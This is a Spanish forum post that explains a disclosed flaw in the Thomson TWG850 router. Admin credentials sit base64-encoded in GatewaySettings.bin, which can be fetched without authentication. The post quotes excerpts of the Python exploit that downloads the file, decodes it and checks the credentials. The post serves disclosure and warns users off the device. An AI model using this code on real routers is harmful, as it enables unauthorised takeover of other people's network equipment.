El libre pensamiento para un internet libre

No estas registrado.  

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 05-09-2015 10:19:11

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,252

Obtener los credenciales de administrador de un Thomson TWG850

Obtener los credenciales de administrador de un Thomson TXG850

Thom1.jpg

  Esto no es una lavadora: es un router.
Un router un  "poco" anticuado con un diseño muy "Thomson" (ex-speedtouch, ahora Technicolor) .
¿Será por intentar hacer olvidar que crearon estos monstruos que esta empresa ha cambiado de nombre tantas veces? tongue
Y tienen una brecha muy seria que permite a un intruso o a uno usuario no autorizado de hacerse con la contraseña root del dispositivo.
Podemos ver el "exploit" en este tema de packet storm :

Lo que ocurre es que los credenciales están

  1. en un fichero accesible  sin conocer la contraseña root

  2. cifrados en base 64 y es una función de hash reversible

1. Se pasa por CatewaySettings.bin : vemos la variable "bifi" definida aquí

bifi  = 'GatewaySettings.bin'

Par ser empleada en la petición

req = urllib2.Request('%s/%s'%(router,bifi))

2. Aquí vemos como se hace el descifrado (base 64 ) con un bucle "for"

for s in hr_data(bifi):
            try:
                dec = base64.decodestring(s)

Y luego se pillan  los datos con el "bucle if"
               

 if dec.find(':') != -1:
                    user,passwd = dec.split(':')
                    print '(+)- User: %s%s%s'%(G_C,user,D_C)
                    print '(+)- Pass: %s%s%s'%(G_C,passwd,D_C)
                     
                    print '(+)- Checking if creds are OK...'
                    checkcreds(router,user,passwd)

No hay  remedio y no habrán actualizaciones para este router.   
No es aconsejable usarlo como router para su red domestica.

Los créditos para este full disclosure van a  Glaysson dos Santos
  Fuente:

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

Temas similares

Tema Respuestas Vistas Ultimo mensaje
3 139 Hoy 14:45:15 por crash
Hostbase 1.2 está aqui por Koala  [ 1 2 3 4 5 ]
103 5432 Hoy 14:28:04 por crash
67 1991 Hoy 13:35:16 por crash
27 2600 Ayer 21:05:17 por josep345
17 592 Ayer 16:36:48 por bala

Pie de página

Información del usuario

Ultimo usuario registrado: juanita
Usuarios registrados conectados: 1
Invitados conectados: 15

Conectados: kastell

Estadisticas de los foros

Número total de usuarios registrados: 1,114
Número total de temas: 1,121
Número total de mensajes: 11,583

Máx. usuarios conectados: 69 el 15-10-2017 09:23:21